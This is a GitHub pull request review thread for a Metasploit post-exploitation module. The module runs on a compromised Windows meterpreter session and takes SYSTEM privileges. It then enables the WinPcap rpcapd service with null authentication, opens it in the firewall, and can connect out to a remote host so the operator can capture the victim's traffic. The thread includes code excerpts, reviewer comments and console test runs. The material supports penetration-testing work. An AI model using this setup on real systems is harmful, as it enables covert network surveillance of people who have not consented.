Skip to content

Post windows module to start rpcapd service (active/pasive mode) #761

Merged
merged 3 commits into from Nov 28, 2012

3 participants

@BorjaMerino

The module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall).

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
@jlee-r7
jlee-r7 added a note Sep 6, 2012

Modules should not run getsystem. Check for necessary privileges and tell the user if they need to run it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
@jlee-r7
jlee-r7 added a note Sep 6, 2012

Artificial restriction. This is a fairly simple task that should work just fine on java or a shell session.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ print_good("Got System")
+ return true
+ else
+ print_error("Couldn't get System")
+ return false
+ end
+ elsif !is_admin? and datastore['GETSYSTEM']==false
+ return false
+ else # is_admin? = true
+ return true
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ client.sys.process.execute("cmd.exe /c sc config rpcapd binpath= \"#{p}\" ",nil, {'Hidden' => 'true', 'Channelized' => true})
@jlee-r7
jlee-r7 added a note Sep 6, 2012

You should avoid process.execute when cmd_exec will do (i.e., unless you need to use a token). Using process.execute means this can't run on a shell session.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if (client.fs.file.exists?(prog))
@jlee-r7
jlee-r7 added a note Sep 6, 2012

use the methods from Post::File which are platform and session type independent.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012
modules/post/windows/manage/rpcapd_start.rb
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=client.fs.file.expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
@jlee-r7
jlee-r7 added a note Sep 6, 2012

use expand_path from the Post::File mixin instead.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@BorjaMerino

Hi @jlee-r7 thanks for all the explanations

@jvazquez-r7

Tested successfully:

msf  exploit(handler) > use post/windows/manage/rpcapd_start 
msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > show sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.1.129:4444 -> 192.168.1.147:1743 (192.168.1.147)

msf  post(rpcapd_start) > set SESSION 1
SESSION => 1
msf  post(rpcapd_start) > run

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed

After that I'm able to connect to the remote interface on the port 2002 and capture traffic from a remote host.

@BorjaMerino

@jvazquez-r7 Thank you so much for checking it out

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012
modules/post/windows/manage/rpcapd_start.rb
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ print_error("RHOST is not set ") if datastore['RHOST']==nil
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
@jvazquez-r7
jvazquez-r7 added a note Nov 27, 2012

As @jlee-r7 has pointed, could happen that RHOST is nil. It doesn't seem to have sense when running in active mode, has it?

If RHOST is always needed to run in active mode, in case of RHOST being nil, just print_error to warn the user and return.

Thanks @jlee-r7 for keep pointing!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012
modules/post/windows/manage/rpcapd_start.rb
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
@jvazquez-r7
jvazquez-r7 added a note Nov 27, 2012

Can MSF_LICENSE be used? of you would like to use BSD_LICENSE?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@BorjaMerino

@jvazquez-r7 yes of course MSF_LICENSE, I was wrong to write it and I've just seen that I also put BSD_LICENCE in the safe delete (sdel). Could you please change it?

Thank you

@jvazquez-r7

@bmerinofe sure I can change the license type for you when merging, no problem! :)

Is there any response for the comment about the RHOST being nil in the active mode? (see above :) )

@jvazquez-r7

Awesome, looks good! and works as expected, merging!

msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > set session 1
session => 1
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed
msf  post(rpcapd_start) > set ACTIVE true
ACTIVE => true
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[-] RHOST is not set 
[*] Post module execution completed

@jvazquez-r7 jvazquez-r7 merged commit cdd9eb1 into rapid7:master Nov 28, 2012

1 check passed

Details default The Travis build passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.